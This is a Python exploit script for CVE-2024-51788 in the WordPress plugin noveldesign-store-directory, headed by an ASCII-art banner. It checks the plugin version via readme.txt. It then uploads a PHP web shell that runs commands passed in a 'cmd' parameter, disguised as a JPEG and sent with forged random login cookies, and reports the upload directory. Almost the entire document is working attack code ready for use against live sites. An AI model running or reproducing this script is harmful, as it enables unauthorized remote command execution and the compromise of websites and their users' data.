print('''
:'######::'##::::'##:'########:::::::::::'#######::::'#####::::'#######::'##:::::::::::::::::'########::::'##:::'########::'#######:::'#######::
'##... ##: ##:::: ##: ##.....:::::::::::'##.... ##::'##.. ##::'##.... ##: ##:::'##::::::::::: ##.....:::'####::: ##..  ##:'##.... ##:'##.... ##:
 ##:::..:: ##:::: ##: ##::::::::::::::::..::::: ##:'##:::: ##:..::::: ##: ##::: ##::::::::::: ##::::::::.. ##:::..:: ##::: ##:::: ##: ##:::: ##:
 ##::::::: ##:::: ##: ######:::'#######::'#######:: ##:::: ##::'#######:: ##::: ##::'#######: #######::::: ##:::::: ##::::: #######::: #######::
 ##:::::::. ##:: ##:: ##...::::........:'##:::::::: ##:::: ##:'##:::::::: #########:........:...... ##:::: ##::::: ##:::::'##.... ##:'##.... ##:
 ##::: ##::. ## ##::: ##:::::::::::::::: ##::::::::. ##:: ##:: ##::::::::...... ##:::::::::::'##::: ##:::: ##::::: ##::::: ##:::: ##: ##:::: ##:
. ######::::. ###:::: ########:::::::::: #########::. #####::: #########::::::: ##:::::::::::. ######:::'######::: ##:::::. #######::. #######::
:......::::::...:::::........:::::::::::.........::::.....::::.........::::::::..:::::::::::::......::::......::::..:::::::.......::::.......:::
''')

# Exploit By: Coded By : Nxploit | Khaled ALenazi,


import requests
import random
import string
import argparse
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

UPLOAD_DIR = "/wp-content/plugins/noveldesign-store-directory/images/"
USER_AGENT = (
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/113.0.0.0 Safari/537.36"
)

def generate_random_cookie():
    return ''.join(random.choices(string.ascii_letters + string.digits, k=64))

def check_version(target_url):
    url_version = f"{target_url}/wp-content/plugins/noveldesign-store-directory/readme.txt"
    response = requests.get(url_version, verify=False, headers={"User-Agent": USER_AGENT})

    if response.status_code == 200:
        if "Stable tag: 4.3.0" in response.text or "Stable tag: 4." in response.text:
            print("[✔] Target is vulnerable! Continuing exploitation...\n")
            return True
        print("[✘] Target does not appear to be vulnerable. Exiting.\n")
        return False
    
    print("[!] Could not verify version. Proceeding with exploitation...\n")
    return True

def upload_shell(target_url):
    upload_url = f"{target_url}/wp-admin/options-general.php?page=licence"
    cookies = {
        "wordpress_logged_in": generate_random_cookie(),
        "wp_lang": "en_US",
        "wp-settings-1": "libraryContent=browse&urlbutton=post&hidetb=1",
        "wp-settings-time-1": str(random.randint(1600000000, 1800000000)),
    }

    shell_name = f"Nxploit_{random.randint(1000, 9999)}.php"
    shell_content = "<?php system($_GET['cmd']); ?>"
    files = {
        "default_shop_image": (shell_name, shell_content, "image/jpeg"),
        "btn_default_shop_image": (None, "Upload"),
    }

    session = requests.Session()
    session.verify = False
    response = session.post(upload_url, files=files, cookies=cookies, headers={"User-Agent": USER_AGENT})

    if response.status_code == 200:
        print("[✔] Web Shell successfully uploaded!")
        print(f"    [+] Shell is located in: {UPLOAD_DIR}\n")
    else:
        print("[✘] Exploit failed. Server did not respond as expected.\n")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit script for CVE-2024-51788 by Nxploit Khaled Alenazi.')
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    args = parser.parse_args()

    target = args.url.rstrip('/')
    print(f"[*] Checking if {target} is vulnerable...\n")

    if check_version(target):
        print("[*] Attempting to upload Web Shell...\n")
        upload_shell(target)